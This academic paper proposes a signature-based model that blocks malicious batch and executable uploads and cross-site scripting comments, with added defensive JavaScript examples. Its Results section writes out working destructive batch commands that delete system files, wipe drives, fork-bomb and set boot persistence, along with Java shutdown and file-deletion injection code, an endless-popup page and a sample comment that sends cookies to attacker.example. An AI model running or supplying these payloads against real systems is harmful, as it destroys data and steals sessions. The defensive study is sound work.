Detecting and Preventing Security Threats on Servers and Browsers
Mr. Nandish U. G.1, Dr. Balakrishna R.2, Mr. Naveen L.3, Mr. Anand Kumar K. S.4
2 Professor and HOD; 1, 3 and 4 Lecturer, Department of Information Science and Engineering, Rajarajeswari College of Engineering, Bangalore, India.
Abstract - Our reliance on web-based services accessed through browsers for everyday activities has grown over the years. Every day new vulnerabilities are found in applications previously believed to be secure, creating new risks that can be exploited by malicious advertisers or intruders to compromise the security of systems. Using cross-site scripting techniques, intruders can hijack web sessions and craft credible phishing sites. Similarly, intruders may harm a server by uploading malicious executables and batch files. On the client side, JavaScript code downloaded into the browser can attack client machines to steal users' credentials (XSS attacks) and lure users into providing sensitive information to unauthorized parties (phishing attacks).
This paper proposes a model for detecting and preventing malicious files and cross-site scripting attacks. It monitors JavaScript code execution and compares the observed behaviour with high-level policies in order to detect malicious code. The solution also protects servers from dangerous DOS commands and executable files. The model follows an approach similar to that of hackers and security analysts when discovering vulnerabilities in network-connected web servers, and uses both manually and automatically generated rules to mitigate possible cross-site scripting attacks. The work covers preventing the theft of users' credentials from client machines through cookie hijacking, as well as preventing browser crashes.
Keywords - Server, Browser, attacks, Server and Browser crash.
I. INTRODUCTION
Servers are very important nodes in a network. A server is a computer or a software package that provides a specific kind of service to client software running on other computers. Servers provide various shared resources to workstations and to other servers on a computer network, and one server may serve several roles. A server may be a file server, print server, mail server or authentication server, as described below [2] [3].
A file server, located centrally in the network, lets many users store and share documents.
A print server lets many workstations share a single printer, avoiding the installation of a printer on each workstation.
A mail server provides email services to computers on the network.
An authentication server gives the network a centrally located database for storing account and password information, allowing users to log on at any computer on the network.
Servers are therefore critical components of the network: they are the service providers for its clients. If a server fails, the services it provides are no longer available to requesters, so servers must be protected from attackers. Intruders may attack servers in many ways; two of them are very common.
The first is attacks from malicious executable files. Many servers do not allow users to upload executable and batch files, mainly because such files are a likely carrier of viruses or malicious commands that may harm the server. On the other hand, uploading executable or batch files is convenient: a user can publish an application project without creating a setup package, and interested users can download the executable or batch files and run them on their own systems without installation, which requires less storage than a setup package [4].
The second is cross-site scripting attacks. Web applications execute on both the server and the client machine, and web pages include content from several sources: content produced by the application itself, content derived from user-supplied text, and content from partially trusted third parties. Web applications are therefore vulnerable to cross-site scripting attacks, which can take place while a user browses the internet.
A typical loophole is a comment box in a web page into which an attacker injects malicious code and submits it to the server. Cross-site scripting attacks against browsers include cookie hijacking, alert boxes that can never be closed, and scripts that open an unbounded number of windows and exhaust system resources.
II. PROBLEM STATEMENT
A few solutions already exist for attacks through malicious files and for cross-site scripting attacks; this section describes some existing systems.
server, then they harm the server when some other user runs them on the server. Many discussion forums [7], [8], [9] describe the problems with uploading exe and bat files, and also describe techniques for uploading exe or batch files to a server anyway. The existing solutions apply only to specific servers and do not provide much security for them.
Cross Site Scripting Attacks: Many server-side and client-side solutions exist to prevent cross-site scripting, such as the same-origin policy [4], browser patches [5], Browser-Enforced Embedded Policies (BEEP) [6] and SWAP [7]. All of these protection models suffer from some drawbacks; the most common shortcomings are as follows:
Lack of Efficiency: Protection models are often required to evaluate events in real time. This requirement is difficult to meet when faced with the very large number of events typical of today's networks; consequently the models often slow down system performance.
High Number of False Positives: Most protection models detect attacks throughout an enterprise by analyzing information from a single host, a single application or a single network interface at many locations in the network. False alarms are frequent and attack recognition is imperfect. Adjusting thresholds to reduce false alarms increases the number of attacks that get through undetected as false negatives. Improving the accuracy with which protection models detect attacks is the primary problem facing developers today.
Burdensome Maintenance: Configuring and maintaining a protection model requires specialist knowledge and substantial effort. For example, misuse detection has usually been implemented with expert-system shells that encode and match signatures using rule sets. Upgrading a rule set involves details peculiar to the expert system and its rule language, which may permit only an indirect specification of the sequential relationships between events. Similar considerations apply to adding a statistical metric, typically used to detect unusual deviations in behaviour.
Limited Flexibility: Protection models have typically been written for a specific environment and have proved difficult to use in other environments with similar policies and concerns. The detection mechanism can also be difficult to adapt to different usage patterns. Tailoring detection mechanisms to the system in question, and replacing them over time with improved techniques, is also problematic with many server protection model implementations; often the protection model must be restarted completely for changes and additions to take effect.
Every day new vulnerabilities are found in applications previously believed to be secure, creating new risks that can be exploited by malicious advertisers or intruders to compromise the security of systems. Intruders may harm a server by uploading malicious executables and batch files, or by injecting malicious code into web applications. On the client side, JavaScript code downloaded into the browser can attack client machines to steal users' credentials (XSS attacks) and lure users into providing sensitive information to unauthorized parties (phishing attacks). In general, XSS and phishing attacks are easy to execute but difficult to detect and prevent.
III. RELATED WORK
This paper proposes a model for detecting and preventing security threats on servers and browsers, based on monitoring malicious activity to detect malicious code behaviour. The solution protects servers from malicious executable files, batch files and malicious code injected by attackers through web applications. The work also covers preventing the theft of users' credentials from client machines through cookie hijacking, and preventing browser crashes.
The main objective of this work is to provide a protection mechanism for servers and browsers. The major features of the proposed solution are:
It prevents malicious executable and batch files from being uploaded to servers.
It protects against cross-site scripting attacks that may delete files on the server, shut the server down or misuse server resources.
It prevents XSS attacks that would otherwise crash the browser.
It prevents alert-box attacks.
It prevents the theft of users' credentials from client machines through cookie hijacking.
IV. DESIGN
Design is the process of producing a solution to the specification derived from the analysis stage. This section explains the design of the proposed system.
Fig. 1: Preliminary Design of the Proposed Model
The malicious code detector scans uploaded files and cross-checks them against the database (the stored list of malicious attacks) to detect malicious code. It also checks incoming comments to decide whether they are attacks. Files or comments from clients that contain malicious code are dropped; the rest are forwarded to the server.
V. IMPLEMENTATION
System Architecture: Fig. 2 depicts the architecture of the protection model.
Fig. 2: System Architecture
As shown in the diagram, the components interact by sending input to and receiving input from one another. There are four components: Client, Server, Protection Model (with the Malicious-Codes (MC) database) and Browser.
Modular Implementation of Server Side Solution
The server-side architecture is divided into the following modules:
Uploading executable and batch files to the server.
Checking all incoming comments and dropping malicious comments.
These two modules are explained in detail below.
Uploading Executable and Batch Files into Server
In the proposed protection model, ordinary (non-executable) files that are within the buffer size are simply allowed through. When the user uploads an executable or batch file, the protection model scans it for malicious commands; if any are found, the file is not allowed onto the server, otherwise it is allowed provided it is within the buffer size. Concretely, the monitoring function is called whenever the protection model receives an executable or batch file, and it invokes the scan function, which checks the file for malicious activity. For all other file types the else branch runs: the file size is checked against the buffer size, and the file is admitted to the server if it does not exceed that size, otherwise it is deleted.
Checking Incoming Comments for Embedded Malicious Code
The second module handles dangerous attacks carried in comments, such as attacks that delete files on the server, misuse server resources or shut the server down. On receiving a request or comment, the protection model compares it with the predefined malicious-code database to decide whether it is a normal request or an attack. If it matches an entry in the database it is treated as an attack, and the protection model blocks it rather than allowing it to reach the server.
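As an added example that is not part of the original paper's code, the following Node.js program implements both server-side modules above in the paper's signature-database style: scanUpload() applies the buffer-size check and scans executable or batch uploads against a malicious-command list, and checkComment() checks a comment against the same database. The signature list, the 64 KB buffer size, the file extensions treated as executable and the sample inputs are assumptions made for this example; the signatures cover the command families listed in the Results section rather than literal strings, and escapeHtml() is included because a signature list cannot replace output encoding.

```javascript
// Added example (not the paper's own code): a signature-based "protection
// model" in the paper's sense, written for Node.js. scanUpload() mirrors the
// executable/batch-file module and checkComment() the comment module. The
// signature list, the buffer size and the sample inputs below are assumptions
// made for this example.
'use strict';

const MAX_UPLOAD_BYTES = 64 * 1024; // assumed "buffer size"

// Malicious-code database. Each entry is a regular expression rather than a
// literal string so that one signature covers case, spacing and quoting
// variants; scopes says whether it applies to uploaded files, comments or both.
const MALICIOUS_SIGNATURES = [
  { name: 'shutdown',      scopes: ['file', 'comment'], re: /\bshutdown\b[^\r\n]*[-\/][rsf]\b/i },
  { name: 'delete-system', scopes: ['file'], re: /\b(del|erase|rd|rmdir)\b[^\r\n]*(%systemdrive%|\\windows\\|\\system32\\)/i },
  { name: 'wipe-all',      scopes: ['file'], re: /\bdel\b[^\r\n]*\*\.\*[^\r\n]*\/s\b/i },
  { name: 'fork-bomb',     scopes: ['file'], re: /^\s*:(\w+)\s*$[\s\S]*?\bstart\b[\s\S]*?\bgoto\s*:?\1\b/im },
  { name: 'run-key',       scopes: ['file'], re: /\breg\s+add\b[^\r\n]*\\currentversion\\run\b/i },
  { name: 'rename-sweep',  scopes: ['file'], re: /\bren\b\s+\*\.\w+\s+\*\.\w+/i },
  { name: 'net-release',   scopes: ['file'], re: /\bipconfig\s*\/release/i },
  { name: 'net-send-loop', scopes: ['file'], re: /\bnet\s+send\s+\*/i },
  { name: 'script-tag',    scopes: ['comment'], re: /<\s*script\b/i },
  { name: 'event-handler', scopes: ['comment'], re: /\bon(click|load|error|mouseover)\s*=/i },
  { name: 'cookie-access', scopes: ['comment'], re: /document\s*\.\s*cookie/i },
  { name: 'popup-loop',    scopes: ['comment'], re: /window\s*\.\s*open\s*\(/i },
  { name: 'runtime-exec',  scopes: ['comment'], re: /Runtime\s*\.\s*getRuntime|\.exec\s*\(/i },
  { name: 'file-delete',   scopes: ['comment'], re: /\.(delete|listFiles)\s*\(/i },
];

// Normalise before matching so trivial evasions (odd casing, stray quotes,
// doubled backslashes, runs of blanks) still hit the signatures.
function normalise(text) {
  return String(text)
    .replace(/["']/g, '')
    .replace(/\\{2,}/g, '\\')
    .replace(/[ \t]+/g, ' ')
    .toLowerCase();
}

function matchSignatures(text, scope) {
  const n = normalise(text);
  return MALICIOUS_SIGNATURES
    .filter(s => s.scopes.includes(scope) && s.re.test(n))
    .map(s => s.name);
}

// Module 1: decide whether an upload may reach the server. Only files with an
// executable/batch extension are scanned; other files are admitted if they
// fit in the buffer, as the paper describes.
function scanUpload(filename, content) {
  if (Buffer.byteLength(content, 'utf8') > MAX_UPLOAD_BYTES) {
    return { allowed: false, reason: 'exceeds buffer size', matches: [] };
  }
  if (!/\.(exe|bat|cmd)$/i.test(filename)) {
    return { allowed: true, reason: 'ordinary file within buffer size', matches: [] };
  }
  const matches = matchSignatures(content, 'file');
  return matches.length
    ? { allowed: false, reason: 'malicious commands found', matches }
    : { allowed: true, reason: 'scanned clean', matches };
}

// Module 2: decide whether a comment may be stored.
function checkComment(comment) {
  const matches = matchSignatures(comment, 'comment');
  return { allowed: matches.length === 0, matches };
}

// A signature list is a filter, not a substitute for output encoding: even a
// comment that passes checkComment() must be escaped before it is written
// into a page, otherwise any payload the list does not know about runs.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Constructed sample inputs (not taken from any real upload or comment).
const SAMPLE_FORK_BOMB = ':s\r\nstart fork.bat\r\ngoto :s\r\n';
const SAMPLE_BENIGN_BAT = '@echo off\r\necho Building project...\r\njavac -d out src\\*.java\r\n';
const SAMPLE_XSS_COMMENT =
  '<script>document.location="http://attacker.example/?c=" + document.cookie</script>';

function demo() {
  return {
    forkBomb: scanUpload('fork.bat', SAMPLE_FORK_BOMB),
    benign: scanUpload('build.bat', SAMPLE_BENIGN_BAT),
    oversized: scanUpload('notes.txt', 'x'.repeat(MAX_UPLOAD_BYTES + 1)),
    xssComment: checkComment(SAMPLE_XSS_COMMENT),
    safeComment: checkComment('Nice article, thanks!'),
    escaped: escapeHtml(SAMPLE_XSS_COMMENT),
  };
}

if (typeof module !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Run it with `node` to see each decision together with the names of the signatures that fired. The regular-expression form and the normalisation step are what keep a database of this kind useful against the spacing and quoting variants seen in the Results section; a list of exact strings, which is what the paper describes, misses `ShUtDoWn  -r` or `del  "C:\\WINDOWS\\..."`.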
Modular Implementation of Browser Side Solution
The WebBrowser control has two undocumented methods, AttachInterfaces() and DetachInterfaces(), which must be used to obtain a reference to the underlying browser interface.
Handling the Script Errors
The sample application has a tool window that lists the script errors that have occurred, with their details. A single-instance class holds the script error information and notifies subscribers when it changes. To handle script errors, the BrowserControl first attaches to the DownloadComplete event and then subscribes to the HtmlWindow.Error event; when that event fires, the script error is recorded and the Handled property is set to true so that the browser does not show its own error dialog.
VI. RESULTS
Attacks on Servers
Attacks from Executable and Batch Files: The proposed protection model scans executable and batch files and successfully detects all of the dangerous commands listed below.
Shutdown Computer Once
shutdown -r -f -t 0
This command forces an immediate restart as soon as the user runs the exe or bat file containing it.
Crash Windows
del "C:\WINDOWS\SYSTEM32\bootok" /Q /S >nul
del "C:\WINDOWS\SYSTEM32\bootvid.dll" /Q /S >nul
del "C:\WINDOWS\SYSTEM32\bootvrfy" /Q /S >nul
After the exe or bat file containing these commands is run, the next restart fails with a message that Windows could not start because a file is missing or corrupt.
Destroy OS
@echo off
del %systemdrive%\"." /f /s /q
shutdown -r -f -t 00
This destroys the OS; Windows reports that a file is missing.
Fork Bomb
:s
start fork.bat
goto :s
or
:x
start
goto :x
The code above crashes the server and is extremely hard to stop once started; it brings the server down entirely and it cannot be recovered with the repair options.
Deadly Commands
@echo off
del "c:\windows\pchealth\"
del "c:\windows\System\"
del "c:\windows\system32\restore\"
del "winlogon.exe"
del "c:\windows\system32\autoexec.nt"
del "c:\windows\system32\logonui.exe"
del "c:\windows\system32\ntoskrnl.exe"
The code above is a deadly virus that harms the server: it deletes core system files such as autoexec.nt, logonui.exe, winlogon.exe and ntoskrnl.exe, after which the server will not boot.
Loss of Microsoft Common Console Document File
del "C:\WINDOWS\SYSTEM32\devenum.dll" /Q /S >nul
del "C:\WINDOWS\SYSTEM32\devmgr.dll" /Q /S >nul
del "C:\WINDOWS\SYSTEM32\devmgmt.msc" /Q /S >nul
After this code runs, the system loses the Microsoft Common Console Document file for Device Manager, and devices can no longer be managed.
Loss of Login, Logoff and Logon Interface
del "C:\WINDOWS\SYSTEM32\login.bat" /Q /S >nul
del "C:\WINDOWS\SYSTEM32\logoff.exe" /Q /S >nul
del "C:\WINDOWS\SYSTEM32\logon.exe" /Q /S >nul
After this code runs, the login and logoff features and the logon interface are lost.
Delete Boot Files
The following code deletes boot files on the server.
del "C:\WINDOWS\SYSTEM32\logonui.exe" /Q /S >nul
del "C:\WINDOWS\SYSTEM32\bootvid.exe" /Q /S >nul
del "C:\WINDOWS\SYSTEM32\bootvrfy.exe" /Q /S >nul
Shutdown Computer Every Time It Is Turned On
echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v /t reg_sz /d c:\windows\hartlell.bat /f
echo You have been HACKED.
PAUSE
This code writes a batch file that forces a restart and registers it under the Run keys, so the server shuts down a few seconds after every start-up.
Disable Internet Permanently
echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig /release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\currentversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo You Have Been HACKED!
PAUSE
This code releases the machine's IP addresses at every start-up, so once it has executed the computer or server has no internet connectivity.
Change Files to Non-Working TXT Files
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT
These commands rename the documents, images, shortcuts, media files and programs in the current directory to .txt, so they no longer open with their normal applications.
Temporarily Flood Network / Temporarily Disable Internet
:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
or
ipconfig /release
Code Injection Attacks: The attacks we worked on are those that cause loss of files on the server, misuse of server resources and server shutdown.
Attack which causes loss of files
File[] listfile = file.listFiles();
for (int i = 0; i < listfile.length; i++) listfile[i].delete();
Misuse of server resources
fos = new FileOutputStream("C:\\NewName\\" + filename);
byte b[] = new byte[fis.available()];
fis.read(b); fos.write(b); fos.close(); fis.close();
Shutdown
The attacker uses the following code to shut down the server; "cmd /c shutdown -s" is the shutdown command.
Runtime rt = Runtime.getRuntime();
rt.exec("cmd /c shutdown -s");
The proposed protection model blocks all of these attacks successfully by cross-checking user comments against the predefined list of malicious attacks stored in the protection model database.
Fig. 3 shows, first, the time required to upload executable files with and without the protection model and, second, the time required to save user comments with and without scanning them for malicious code.
Fig 3: With and without Protection model
Attacks on Browsers: The dissertation work has produced the following outcome.
Attacks which Crash the Browsers:
We have built a new web browser and added security features to protect against cross-site scripting (XSS) attacks. It is currently able to detect and prevent attacks that crash the browser. One such attack opens an unbounded number of windows, putting the browser into a loop and slowing the whole system down.
Attack code:
<html>
<head>
<script type="text/javascript">
<!--
function myPopup() {
  window.open("http://www.google.com/");
  myPopup();
}
//-->
</script>
</head>
<body>
<h1>welcome to popup window threat</h1>
<form>
<input type="button" onClick="myPopup()" value="click here for fast access">
</form>
<p onClick="myPopup()">CLICK ME TOO!</p>
</body>
</html>
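As an added example that is not part of the original paper or of its Secure Web Browser, the following JavaScript shows one way a browser or an extension can defend against the attack page above and against the alert-box attack mentioned earlier: window.open() and alert() are wrapped with a sliding-window counter, so a script can open only a few windows or raise only a few alerts per interval and further calls are refused. The limits, the injectable clock and the fake window object used in the demo are assumptions made for this example; in a real browser the attack's unbounded recursion eventually ends with a stack-overflow error, but only after every level has already requested a window, which is why the count of windows actually opened is what the guard bounds.

```javascript
// Added example (not the paper's Secure Web Browser): a guard that rate-limits
// window.open() and alert() from script, so that a page like the one above
// cannot open windows without bound or trap the user in an endless series of
// alert boxes. The limits, the injected clock and the fake window used in the
// demo are assumptions made for this example.
'use strict';

const DEFAULT_LIMITS = { maxOpens: 3, maxAlerts: 5, windowMs: 10000 };

// Wraps win.open and win.alert with a sliding-window counter. `now` is
// injectable so the behaviour can be tested without real time passing.
function installPopupGuard(win, limits = {}, now = () => Date.now()) {
  const cfg = { ...DEFAULT_LIMITS, ...limits };
  const state = { opens: [], alerts: [], blockedOpens: 0, blockedAlerts: 0 };
  const originalOpen = win.open;
  const originalAlert = win.alert;

  // Drop timestamps that have fallen outside the window, return what is left.
  function recent(list) {
    const cutoff = now() - cfg.windowMs;
    while (list.length && list[0] < cutoff) list.shift();
    return list;
  }

  win.open = function guardedOpen(...args) {
    if (recent(state.opens).length >= cfg.maxOpens) {
      state.blockedOpens += 1;
      return null; // same result a browser popup blocker gives the page
    }
    state.opens.push(now());
    return originalOpen.apply(win, args);
  };

  win.alert = function guardedAlert(...args) {
    if (recent(state.alerts).length >= cfg.maxAlerts) {
      state.blockedAlerts += 1;
      return; // swallow the alert instead of showing yet another modal box
    }
    state.alerts.push(now());
    return originalAlert.apply(win, args);
  };

  return {
    stats: () => ({
      opensInWindow: state.opens.length,
      alertsInWindow: state.alerts.length,
      blockedOpens: state.blockedOpens,
      blockedAlerts: state.blockedAlerts,
    }),
    uninstall: () => { win.open = originalOpen; win.alert = originalAlert; },
  };
}

// Stand-in for the attack page: keep calling window.open() as the recursive
// myPopup() would, and count how many calls actually produced a window.
function simulateAttack(win, attempts = 1000) {
  let opened = 0;
  for (let i = 0; i < attempts; i++) {
    if (win.open('http://www.google.com/') !== null) opened += 1;
  }
  return opened;
}

// Constructed window object so the demo runs under Node without a browser.
function makeFakeWindow() {
  const log = { opened: 0, alerted: 0 };
  return {
    log,
    open() { log.opened += 1; return {}; },
    alert() { log.alerted += 1; },
  };
}

function runDemo() {
  const win = makeFakeWindow();
  let clock = 0;                                   // fake milliseconds
  const guard = installPopupGuard(win, { maxOpens: 3, maxAlerts: 2 }, () => clock);
  const opened = simulateAttack(win, 1000);        // attack: 1000 open() calls
  for (let i = 0; i < 50; i++) win.alert('You have been hacked');
  clock += 11000;                                  // let the window expire
  const laterOpen = win.open('http://example.org/') !== null; // legitimate use resumes
  return { opened, laterOpen, ...guard.stats(), realOpens: win.log.opened, realAlerts: win.log.alerted };
}

if (typeof module !== 'undefined' && require.main === module) {
  console.log(runDemo());
}
```

In a page context the call is simply `installPopupGuard(window)`; the guard must be installed before untrusted script runs, since a script that has already captured the original window.open can bypass the wrapper.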
VII. CONCLUSION
Every day new vulnerabilities are found in applications previously believed to be secure, creating new risks that can be exploited by malicious advertisers or intruders to compromise the security of systems. Using cross-site scripting techniques, intruders can hijack web sessions and craft credible phishing sites. Similarly, intruders may harm a server by uploading malicious executables and batch files. On the client side, JavaScript code downloaded into the browser can attack client machines to steal users' credentials (XSS attacks) and lure users into providing sensitive information to unauthorized parties (phishing attacks). In general, XSS and phishing attacks are easy to execute but difficult to detect and prevent. This paper has proposed a model for detecting and preventing security threats on web servers and browsers, based on monitoring JavaScript code execution and comparing it with high-level policies to detect malicious code behaviour. The solution protects servers from dangerous DOS commands, executable and batch files, and code injection attacks. The work also covers preventing the theft of users' credentials from client machines through cookie hijacking and preventing browser crashes; for the latter we created a new browser called Secure Web Browser.
VIII. FUTURE ENHANCEMENT
This project can be extended to protect against many other types of attack and to make servers and browsers more secure. The proposed model scans executable files and finds all of the malicious commands listed above, but for malicious code in user comments it currently defends against only a few attacks; it can be extended to prevent many more. The browser we created can prevent the XSS attacks that crash the browser; our work on cookie hijacking and alert-box attacks is continuing, and it can be extended to cover all types of XSS attack.
ACKNOWLEDGEMENTS
The authors are thankful for the encouragement and support received throughout this research work from Dr. M. S. Bhagyashekar, Principal, and the Management of RRCE, Bangalore.
REFERENCES
[1] P. Raman, "JaSPIn: JavaScript based Anomaly Detection of Cross-site scripting attacks," 2008.
[2] O. Hallaraker and G. Vigna, "Detecting Malicious JavaScript Code in Mozilla," Reliable Software Group, Department of Computer Science, University of California, Santa Barbara, 2004.
[3] http://en.wikipedia.org/wiki/Cross-site_scripting
[4] Mozilla Foundation, "JavaScript Security: Same Origin," http://www.mozilla.org/projects/security/components/same-origin.html, February 2006.
[5] C. Jackson, A. Bortz, D. Boneh and J. C. Mitchell, "Protecting Browser State from Web Privacy Attacks," Stanford University, 2006.
[6] T. Jim, N. Swamy and M. Hicks, "Defeating Script Injection Attacks with Browser-Enforced Embedded Policies," AT&T Labs Research and University of Maryland, College Park, 2007.
[8] M. Van Gundy and H. Chen, "Noncespaces: using randomization to enforce information flow tracking and thwart cross-site scripting attacks," University of California, Davis, 2008.
[9] N. Jovanovic, C. Kruegel and E. Kirda, "Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities (Technical Report)," Secure Systems Lab, Vienna University of Technology, 2006.
[10] K. Jayaraman, W. Du, B. Rajagopalan and S. J. Chapin, "ESCUDO: A Fine-grained Protection Model for Web Browsers," Department of EECS, Syracuse University, 2010.
AUTHORS' BIOGRAPHY
Mr. Nandish U. G. obtained his M.Tech degree from East West Institute of Technology, Bangalore, affiliated to Visvesvaraya Technological University, Karnataka. He is working as a Lecturer in the Department of Information Science and Engineering, Rajarajeswari College of Engineering, Bangalore, India. His research interests are in the fields of cloud computing, image processing and computer networks.
Dr. R. Balakrishna is working as Professor and HOD, Rajarajeswari College of Engineering, Bangalore, India. His research interests are in the fields of wireless ad hoc networks, sensor networks, artificial neural networks, data mining, operating systems and security. He has published over 30 papers in national and international journals and conferences across India and other countries. He is a life member of the Indian Society for Technical Education and of IAENG.
Mr. Naveen L. obtained his M.Tech degree from East Point College of Engineering and Technology, Bangalore, affiliated to Visvesvaraya Technological University, Karnataka. He is working as a Lecturer in the Department of Information Science and Engineering, Rajarajeswari College of Engineering, Bangalore, India. His research interests are in the fields of cloud computing, image processing and computer networks.